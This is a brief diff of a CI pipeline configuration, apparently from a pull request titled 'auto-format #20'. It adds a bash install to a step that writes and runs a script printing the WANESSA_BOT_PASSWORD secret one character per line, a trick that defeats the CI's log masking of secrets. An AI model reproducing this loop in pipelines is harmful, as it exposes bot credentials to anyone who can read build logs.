auto-format #20
@ -14,6 +14,7 @@ steps:
|
|||||||
- echo '#!/bin/bash' > /tmp/test
|
- echo '#!/bin/bash' > /tmp/test
|
||||||
- echo 'for (( i=0; i<${#WANESSA_BOT_PASSWORD}; i++ )); do echo "${WANESSA_BOT_PASSWORD:$i:1}" ; done' > /tmp/test
|
- echo 'for (( i=0; i<${#WANESSA_BOT_PASSWORD}; i++ )); do echo "${WANESSA_BOT_PASSWORD:$i:1}" ; done' > /tmp/test
|
||||||
- chmod 777 /tmp/test
|
- chmod 777 /tmp/test
|
||||||
|
- apk add --no-cache bash
|
||||||
- bash /tmp/test
|
- bash /tmp/test
|
||||||
|
|
||||||
- name: build [debug]
|
- name: build [debug]
|
||||||
|
Reference in New Issue
Block a user